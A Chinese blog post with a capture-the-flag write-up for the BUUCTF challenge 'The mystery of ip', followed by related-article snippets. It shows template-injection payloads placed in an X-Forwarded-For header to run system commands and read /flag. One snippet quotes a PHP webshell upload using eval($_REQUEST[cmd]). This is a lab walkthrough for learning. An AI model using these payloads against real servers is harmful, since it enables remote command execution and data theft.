BUUCTF——The mystery of ip

最新推荐文章于 2025-05-02 20:48:46 发布
最新推荐文章于 2025-05-02 20:48:46 发布
阅读量195 收藏 4
点赞数 6
分类专栏: BUUCTF 文章标签: web安全 网络安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71914594/article/details/147553426
版权

BUUCTF——The mystery of ip

进入靶场

在这里插入图片描述

有几个功能点,点来看看

flag.php

在这里插入图片描述

hint.php

在这里插入图片描述

没什么发现

目录扫描

扫个目录看看

在这里插入图片描述

扫出来个/.DS_Store

http://node5.buuoj.cn:28576/.DS_Store

下载下来什么也没有什么有用的信息

翻翻Yakit包看看有没有什么能用的东西

flag.php结合题目 The mystery of ip

漏洞利用

构造个XFF试试

X-Forwarded-For: 127.0.0.1

在这里插入图片描述

可以利用

这下就好解决了

构造payload

X-Forwarded-For: {{system('ls')}}

在这里插入图片描述

试了一下显示不了,还以为不行

用hackbar试了一下

在这里插入图片描述

拿到数据

在这里插入图片描述

Yakit抓包的时候能显示,一放到Web Fuzzer里就没了

还是直接hackbar吧,能用就行

慢慢找吧

看看根目录

X-Forwarded-For: {{system('ls /')}}

在这里插入图片描述

在根目录下找到个flag文件

直接cat看看

X-Forwarded-For: {{system('cat /flag')}}

在这里插入图片描述

拿到flag

flag{af94ef81-1cc0-4399-a32f-4493e1c9ce5f}

在这里插入图片描述

下播!

在这里插入图片描述

ocrbench:on the hidden mystery of ocr in large multimodel models
liguandong
07-23 328
文本识别,场景文本中心的视觉问答Scene Text-Centric VQA,文档导向的视觉问答 Document-Oriented VQA,关键信息提取 Key Information Extraction,手写数学公式识别。包括文本识别、场景文本中心的VQA、文档导向的VQA、KIE和手写文本识别,包括1000个问答对,KIE,prompt:直接使用图像中的文本回答这个问题。ChartQA:共9608个人工编写的问题包括了4808个图标,以及17141个图标的人工编写的总结中生成的23111个问题。
BUUCTF——[BJDCTF2020]The mystery of ip
m_de_g的博客
04-25 534
思路真的很重要,没有这个XFF注入的话,我根本解决不了这道题目,还去.Ds_store里面绕半天,一直在错误里老半天,自己又很累,又解决不出来问题。
BUUCTF-WEB
ccfly1012的博客
11-02 4070
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF解题十一道(04)
qq_45837896的博客
06-14 1915
文章目录[GWCTF 2019]我有一个数据库[BJDCTF2020]ZJCTF,不过如此[BJDCTF2020]The mystery of ip[BJDCTF2020]Mark loves cat[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[ASIS 2019]Unicorn shop[BJDCTF2020]Cookie is so stable[BSidesCF 2020]Had a bad day[CISCN 2019 初赛]Love Math [GWCTF 2019
BUU刷题记录——2
weixin_43610673的博客
06-17 2122
[极客大挑战 2019]Upload 上传检测后缀名,文件内容不能有<? 上传a1.jpg GIF89a? <script language="php">eval($_REQUEST[cmd])</script> Bp抓包修改下文件名 不能有php /upload/a1.phtml?cmd=system(‘cat /flag’); [ACTF2020 新生赛]BackupFile /index.php.bak 下载源码 PHP的弱类型特性,int和string是无法直接比
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 7万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
buuctf-[BJDCTF2020]The mystery of ip
qq_42728977的博客
12-23 1517
[BJDCTF2020]The mystery of ip考点复现参考 考点 模板注入 复现 看到提示,说是怎么知道我的ip,那就说明应该是该请求头,然后模板注入,然后发现果然是。 在请求头加入X-Forwarded-For: GET /flag.php HTTP/1.1 Host: node4.buuoj.cn:28006 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 A
[BJDCTF2020]The mystery of ip(ssti模板注入题目)
m0_55109452的博客
06-02 2015
项目场景: 链接http://node3.buuoj.cn:29669/index.php 问题描述: 观察页面找到三个链接,点开flag和hint看看,发现flag那个页面窃取了客户端的ip地址,这题的题目是“The mystery of ipIP的神秘,看来解题是要从这里入手了。 尝试解决: 既然是窃取了IP,考虑是不是XFF或Client-IP这两个header,发现这个IP确实可控,0.0,感觉可以冲了 我想到的第一个就是之前看到的sql注入的http头注入,但是也只是想想罢了,再看看其他方
[bjdctf2020]the mystery of ip
03-16
这是一道关于IP地址的谜题,需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号,我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络...
The Mystery of Legend-开源
06-28
《神秘的传说——开源》是一款深受玩家喜爱的JRPG风格游戏,它的开源特性为开发者和玩家带来了无限的可能性。本文将深入探讨开源软件的概念及其在游戏开发中的应用,以及《神秘的传说》如何利用这一特点来增强游戏...
IEEE会议:第十届网络安全与信息工程国际会议(ICCSIE 2025)
iaast的博客
04-28 472
2025西部信息工程与技术学术论坛暨第十届网络安全与信息工程国际会议(10th International Conference on Cyber Security and Information Engineering)将于7月23-25日西宁召开。本届会议由北京工业大学、青海理工学院主办,浙江工业大学协办,IEEE计算机学会(IEEE Computer Society)技术赞助。
2025蓝桥杯省赛网络安全组wp
2301_79035389的博客
04-27 870
这个也是在赛后才想明白,aes加密用的是十六字节,将前十一个都填成AAAA发过去,因为ecb模式是分组加密,每一组的加密过程都是一样的,所以不需要写脚本还原加密过程去破解(其实硬写也做不到,因为拿不到key,当时我觉得用户名肯定是key,不然解不了,于是就一直卡在这一步了,实际上用户名是明文),直接将发过来的加密数据取出后几组就是admin的加密了。首先是一个按位与,我们都知道,如果gift的结果是1,那说明参与按位与的两个数在对应位置上一定是1.这道题想到思路了,但是忘记dfs怎么写了,脚本没写出来。
网络安全之浅析Java反序列化题目
anquan2233的博客
04-30 1294
这段时间做了几道Java反序列化题目,发现很多题目都是类似的,并且可以通过一些非预期gadget打进去,就打算总结一下常见的题目类型以及各种解法,并提炼出一般性的思维方法。多做题,发现这些题目其实都是有规律的,先发现入口点和限制,再根据已知依赖打gadget,本质上还是要多见多积累。
010302-oss_反向代理_负载均衡-web扩展2-基础入门-网络安全
最新发布
gaogzhen的博客
05-02 420
010302-oss_反向代理_负载均衡-web扩展2-基础入门-网络安全
深入理解网络安全中的加密技术
Thanks_ks 的嵌入式代码熔炉:炼出 STM32 到 RTOS 的极致效能!
04-26 1442
本文深入探讨了加密技术在网络安全中的核心作用,从基础概念到高级应用实践,涵盖对称与非对称加密、常见算法解析、密钥管理、数字签名与证书、HTTPS 安全实现及数据库加密策略。文章还讨论了如何防御中间人攻击,并展望了量子计算带来的挑战及其应对策略。强调持续学习和更新知识以应对新兴安全威胁的重要性。
网络安全零基础培训 L1-9 PHP连接MySQL数据库
2401_86544210的博客
05-01 583
MySQLi是 PHP 用于与 MySQL 数据库进行交互的扩展。
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
视觉与物联智能
04-28 930
网络安全领域,人工智能(AI)引发的网络威胁正对全球个人和组织构成重大风险。传统网络钓鱼攻击因AI工具的滥用不断升级,其频率、复杂性和隐蔽性逐年攀升。其中,**AI语音钓鱼(Vishing)**因其技术先进性和高欺骗性,成为最值得关注的新型攻击手段。
等保系列(一):网络安全等级保护介绍
zakefine的博客
05-01 686
网络安全等级保护(以下简称:等保)是根据《中华人民共和国网络安全法》及配套规定(如《信息安全技术 网络安全等级保护基本要求》等)建立的系统性安全防护机制,要求网络运营者根据信息系统的重要性及受破坏后的影响程度,实施不同等级的安全防护。
第十六周蓝桥杯2025网络安全赛道
ALe0721的博客
04-26 1801
因为只会web,其他方向都没碰过,所以只出了4道。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值